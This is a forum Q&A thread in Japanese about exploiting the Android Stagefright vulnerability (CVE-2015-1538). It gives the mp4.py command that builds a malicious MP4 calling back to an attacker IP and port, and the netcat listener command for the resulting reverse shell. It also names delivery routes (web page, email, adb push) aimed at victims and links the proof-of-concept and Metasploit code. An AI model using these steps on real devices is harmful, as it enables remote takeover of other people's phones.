最近、Stagefrightについて多くの調査を行っており、Android Lollipop以下を実行している多くの携帯電話モデルがこの脆弱性の影響を受けやすいことが確認されています。
そのため、私のS3は実際に ZimperiumのStagefright Detectorアプリ を使用したエクスプロイトに対して脆弱であることが判明したので、テストすることにしました。
Joshua Drakeのステージフライトコード(mp4.py)をダウンロードし、次のコマンドを実行して、悪意のあるMP4ファイルを作成しました。
python mp4.py -c 192.168.x.x -p 4444
c(LAN IPの場合)
pポート番号
オンラインの多くのチュートリアルでは、MMS経由でMP4ファイルをターゲットの電話に送信する前に、netcatを使用してバックドアをセットアップする必要があります。しかし、metasploitを使用してバックドアを作成する方がはるかに効果的であることがわかりました。電話を完全に制御することで。
MP4またはその他のマルチメディアファイルをWebページに埋め込んで、被害者がWebページにアクセスしたときに、上記と同じ方法で電話を完全に制御できると聞いたことがあります。
それで、これはどのように達成できますか?
netcatは、デバイスではなくPCにインストールする必要があります。選択したポートのリスニングモードで、これをnetcatに設定します。
nc -lp 4444
デバイスは、偽造されたビデオファイルを再生することでnetcatを取得します。 MMS=ビデオを電話に送信する必要はありません。ビデオをWebページに埋め込むか、電子メールで送信するか、単にadb Push
コマンドを使用してデバイスに保存します。その後、標準のビデオプレーヤーを使用してビデオを再生すると、PCコマンドラインからデバイスを制御できます。
Metasploitモジュールを試してください: https://github.com/rapid7/metasploit-framework/pull/4742
また、Josua Drakeの元のPoCから https://github.com/jduck/cve-2015-1538-1
まず、これは一般的なエクスプロイトではありません。単一のデバイスモデルで動作するようにテストされています。私のターゲットは、ASLRの部分的な実装のみを含むAndroid 4.0.4を実行しているGalaxy Nexusデバイスでした。
別のデバイスで使用するには、ROCチェーンガジェットのlibc.so関数アドレスを知っている必要があります。